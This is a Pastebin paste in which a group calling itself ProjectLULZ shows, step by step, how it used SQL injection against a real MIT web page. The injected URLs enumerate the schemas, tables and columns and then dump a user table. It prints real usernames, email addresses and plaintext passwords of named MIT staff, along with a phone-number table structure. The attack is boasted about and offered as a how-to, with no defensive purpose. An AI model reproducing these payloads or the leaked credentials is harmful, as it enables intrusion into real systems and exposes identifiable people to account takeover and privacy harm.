API tools faq
paste
Advertisement
Guest User

How i Hacked a MIT site... ProjectLULZ

a guest
Jun 8th, 2011
6,278
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.38 KB | None | 0 0
raw download clone embed print report
  1. Progress File By ProjectLULZ.
  2. Our Twitter -> http://twitter.com/ProjectLULZ
  3.  
  4. This is how i reversed the structure of MIT.
  5.  
  6. 1) Get the Databases
  7.  
  8. http://ilp.mit.edu/webpubdetail.jsp?id=57 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14 --
  9.  
  10. http://ilp.mit.edu/webpubdetail.jsp?id=57 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat%28schema_name%29,11,12,13,14 FROM information_schema.schemata --
  11.  
  12. information_schema,ILPWebV3DB,ILPWebV3Test
  13.  
  14. 2) Find Out the Tables in the Database
  15.  
  16. http://ilp.mit.edu/webpubdetail.jsp?id=57 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat%28table_name%29,11,12,13,14 FROM information_schema.tables WHERE table_schema=database%28%29--
  17.  
  18. AccountConfirmations,CRIS_Addresses,CRIS_Agenda_Tracks,CRIS_Companies,CRIS_Company_Email_Domain,CRIS_Conference_Sponsors,CRIS_ConferencesXE_Note,CRIS_Conferences_And_Events,CRIS_Contact_Funcs,CRIS_Corporate_Web_Users,CRIS_Country_Code,CRIS_Country_CodeXRegions,CRIS_DLCXPapers,CRIS_DLCs,CRIS_DLCsXAreas,CRIS_DLCsXProjects,CRIS_DLCsXRelated_Info,CRIS_E_Note_Categories,CRIS_E_Note_Topics,CRIS_Education,CRIS_Email_Addresses,CRIS_Entity_Names,CRIS_Event_Types,CRIS_Events,CRIS_FAQ_Categories,CRIS_Faculty,CRIS_Files_URLs,CRIS_Groups,CRIS_ILP_Library,CRIS_ILP_LibraryXE_Note,CRIS_ILP_Library_Types,CRIS_ILP_Location_Links,CRIS_Links,CRIS_MIT_Events,CRIS_MIT_People_Category,CRIS_Notes,CRIS_PaperTypes,CRIS_Papers,CRIS_PapersXE_Note,CRIS_PapersXPeople,CRIS_PapersXProjects,CRIS_People,CRIS_PeopleXDLCs,CRIS_PeopleXGroups,CRIS_PeopleXProjects,CRIS_PeopleXRelated_Info,CRIS_PeopleXStartups,CRIS_Phone_Numbers,CRIS_Project_Types,CRIS_Projects,CRIS_ProjectsXAreas,CRIS_Regions,CRIS_Related_Info,CRIS_Research_Areas,CRIS_Resources,CR
  19.  
  20. 3) Now You find the Feilds in a table...
  21.  
  22. http://ilp.mit.edu/webpubdetail.jsp?id=57 UNION SELECT 1,2,3,4,5,6,7,%27Hacked by retroLUL%27,9,group_concat%28column_name%29,11,12,13,14 FROM information_schema.columns WHERE table_name=0x435249535f436f72706f726174655f5765625f5573657273--
  23.  
  24. table name = CRIS_Corporate_Web_Users
  25.  
  26. Corporate_Web_Users_ID,Username,Password,Admin,Entities_ID,Date_Created,Email_Address,Active,People_ID,Department,Division,FirstName,LastName,Address1,Address2,Address3,City,StateCode,PostalCode,CountryCode,UserMemberEligibleFlag,Notes,ExpireDate,User_Hash,Corporate_Web_Users_ID,Username,Password,Admin,Entities_ID,Date_Created,Email_Address,Active,People_ID
  27.  
  28. 4) Now You Print the stuff to the screan :D
  29.  
  30. http://ilp.mit.edu/webpubdetail.jsp?id=57 UNION ALL SELECT 1,2,3,4,5,6,7,%27Hacked by retroLUL%27,9,group_concat%28%27 username: %27,Username,%27 email: %27,Email_Address,%27 passsord: %27, Password,%27 rest: %27,Admin,Corporate_Web_Users_ID,Username,Email_Address,Password,Admin,Entities_ID,Date_Created,Email_Address,Active,People_ID%29,11,12,13,14 FROM CRIS_Corporate_Web_Users
  31.  
  32. username: ocrilp email: kc@ilp.mit.edu passsord: webtest rest: 04ocrilpkc@ilp.mit.eduwebtest02382003-10-05kc@ilp.mit.edu10, username: test email: test@tankdesign.com passsord: testtest rest: 06testtest@tankdesign.comtesttest010022003-10-13test@tankdesign.com00, username: lawson@ilp.mit.edu email: lawson@ilp.mit.edu passsord: ocr rest: 19lawson@ilp.mit.edulawson@ilp.mit.eduocr110022003-10-16lawson@ilp.mit.edu10, username: shansky@ilp.mit.edu email: shansky@ilp.mit.edu passsord: ocr rest: 111shansky@ilp.mit.edushansky@ilp.mit.eduocr110022003-10-16shansky@ilp.mit.edu10, username: detorres@ilp.mit.edu email: detorres@ilp.mit.edu passsord: ocr rest: 012detorres@ilp.mit.edudetorres@ilp.mit.eduocr010022003-10-16detorres@ilp.mit.edu10, username: klingensmith@ilp.mit.edu email: klingensmith@ilp.mit.edu passsord: byteme2 rest: 114klingensmith@ilp.mit.eduklingensmith@ilp.mit.edubyteme2110022003-10-16klingensmith@ilp.mit.edu10, username: wells@ilp.mit.edu email: wells@ilp.mit.edu passsord: byteme3 rest: 117wells@ilp.mit
  33.  
  34. *) Getting Another Table
  35.  
  36. http://ilp.mit.edu/webpubdetail.jsp?id=57 UNION SELECT 1,2,3,4,5,6,7,%27Hacked by retroLUL%27,9,group_concat%28column_name%29,11,12,13,14 FROM information_schema.columns WHERE table_name= 0x435249535f50686f6e655f4e756d62657273 --
  37.  
  38. (CRIS_Phone_Numbers) STRUCTURE
  39.  
  40. Phone_Numbers_ID,Entities_ID,People_ID,Private,Owner_ID,Phone_Number,Type,Country Code,Extension,Notes,Key,DateTimeStamp,Primary,Full_Phone_Number,Sort_Notes,Phone_Numbers_ID,Entities_ID,People_ID,Private,Owner_ID,Phone_Number,Type,Country Code,Extension,Notes,Key,DateTimeStamp,Primary,Full_Phone_Number,Sort_Notes
  41.  
  42. Credit to ProjectLULZ
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!